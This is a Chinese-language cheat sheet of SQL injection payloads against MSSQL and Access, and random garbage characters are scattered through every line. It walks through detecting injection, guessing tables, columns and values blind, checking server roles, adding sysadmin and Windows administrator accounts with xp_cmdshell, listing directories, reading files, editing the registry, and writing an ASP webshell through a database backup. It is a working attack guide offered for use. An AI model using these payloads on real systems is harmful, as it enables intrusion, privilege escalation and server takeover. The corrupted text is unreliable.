1.判断是否有注入;and 1=1 ;and 1=2 2{+\\.4Evk
2.初步判断是否是mssql ;and user>0 1|�z>}
�xP
q3s���c�z�
3.注入参数是字符'and [查询条件] and ''=' ��p�N*>A^
AU-/-h=M�r
4.搜索时没过滤参数的'and [查询条件] and '%25'=' f*oL8"?u&
P-^Z7^o-bX
5.判断数据库系统 Q�o;$iL�t�
r�f)\�:75
;and (select count(*) from sysobjects)>0 mssql ^>9M2O['!s
�n]9y �Cr�
;and (select count(*) from msysobjects)>0 access {T:2+iS9:�
]�l�Z!�e�n
��?1OS%RBF
�)2bP�u�[U
6.猜数据库 ;and (select Count(*) from [数据库名])>0 0_"J��>rMp
��U�6.$F#n
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ? 76jz>;b
�og2]B\mN4
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �F�o;�xA��
j�24BB}mBB
9.(1)猜字段的ascii值(access) DOU\X �N��
��X�`J�~3s
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ���g�<UjB�
�FE$)[�w,m
(2)猜字段的ascii值(mssql) �x]y~KbdeB
�d['�BtV�J
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 i/)�Uj-*G)
/7P4�[~�vw
10.测试权限结构(mssql) eW�7;�yH��
l�D
!^Mq�K
\i`/�k(���
�E8FS� jLZ
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �(F$q|qZ%�
�{��:{N�K%
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- AO8`ItNZdT
#��MOEY�|6
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �#1�V� vK
,�Y9lp�)w�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �7U?x8%H*�
Nz5gu.a6{L
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- a�QinR�"o
g� w�}t.3}
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- +uv]d�D�*i
7�0|C�n(p_
;and 1=(select IS_MEMBER('db_owner'));-- u^iK?S#Ci8
��B�S+N ��
E���>S�nH
3&3S*1b�-H
11.添加mssql和系统的帐户 ���?��N�$�
~p�oy�`�h'
;exec master.dbo.sp_addlogin username;-- �_Y}(v(�(;
;exec master.dbo.sp_password null,username,password;-- e[�R36�4K�
�#XC\=�pZX
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ">Cjn�F2>R
q|�gG{��9
;exec master.dbo.xp_cmdshell 'net user username password [g�H
���vI
�WI}P(!h\J
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �F�S��1<f:
����\7gLk:
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �9Z�
�rWG�
�;t�"#7��\
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ����i��n#g
v0=�^H�y�m
�R:i7Rb2C
^U:pv0Qz
12.(1)遍历目录 _~5{l_v|I�
1(rH5�z�'F
;create table dirs(paths varchar(100), id int) B{c,/{��=O
3{]�i|�1&j
;insert dirs exec master.dbo.xp_dirtree 'c:\' `4�w0�*;k;
#/�5jW�H7U
;and (select top 1 paths from dirs)>0 I^\YD9~=�x
�I&R�4.;LW
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Ay2�Vz>{��
p0�'�A\�@|
vpOz�F>�O�
H��Pr5mWs:
(2)遍历目录 A*M�lK���"
H.w�p{�m{�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- dO �rgqz`e
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 [^�~�Fu9+"
Ou��8@�7S
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �X�^�f�Mt]
����}M�X�Z
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 yv4h�H4Io�
��ldi'@��^
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 y=5��s�~7]
R}���>Gk��
BE}lzn=sF
�u�K}k]x\z
13.mssql中的存储过程 duT2:~H2��
!�t~S.`�vF
xp_regenumvalues 注册表根键, 子键 �3vNo���D�
�|2{y'�?,
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ��M�q6.�!j
.�Cra�hV1G
xp_regread 根键,子键,键值名 :�m^�eNS6:
C!�RxMccTh
;exec xp_regread �A&F@+X6�@
+��a�nNp�y
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �&�7|=8Z[o
sT'�wps�2�
xp_regwrite 根键,子键, 值名, 值类型, 值 1������&Nk
4v�p,izN�W
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 O<."C=�1~E
QZt/�Rm>W0
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 2/q�f�K+a
]}~�*uT}>�
xp_regdeletevalue 根键,子键,值名 i n�F&Pv�
ak�0K�rVF
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ,R ]�]]7)+
X:�@nROL^7
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 YNHn# 98\�
1ci�P+->$�
w*$nG�$���
�sq��j8c)6
14.mssql的backup创建webshell )uZ<?��bkQ
>vt#,8VA�N
use model s��AC1�Pda
@&mv4z�z&W
create table cmd(str image); ) d�w�PD�
Y�DC[s ^d5
insert into cmd(str) values (''); >�L?/Ph�%d
6hAeLl��U1
backup database model to disk='c:\l.asp'; mY#[D;�mUe
e��=1&mO�?
jO<K0�c�c�
BL�uIL�E:$
15.mssql内置函数 gWv/3h�WWB
!T6oD�]x3
;and (select @@version)>0 获得Windows的版本号 a�}0\kDe��
u <�D&R��T
;and user_name()='dbo' 判断当前系统的连接用户是不是sa WI](a8�bm�
�qW�$I�puK
;and (select user_name())>0 爆当前系统的连接用户 Y'�%�sA~�g
AX<TkS@wjb
;and (select db_name())>0 得到当前连接的数据库 }!lLA4X�Rr
�[$OD+@~A2
vC&y:XMt,`
nP��R_:_�^
16.简洁的webshell <P�(�d%XEl
QYyF6ht=!�
use model 6wIv�7@�Y�
kH�m1�aE�<
create table cmd(str image); dkLc"$(�O�
*N�[.']#n
insert into cmd(str) values (''); O&E1(M|*>�
F�FK7�9e/5
backup database model to disk='g:\wwwtest\l.asp';
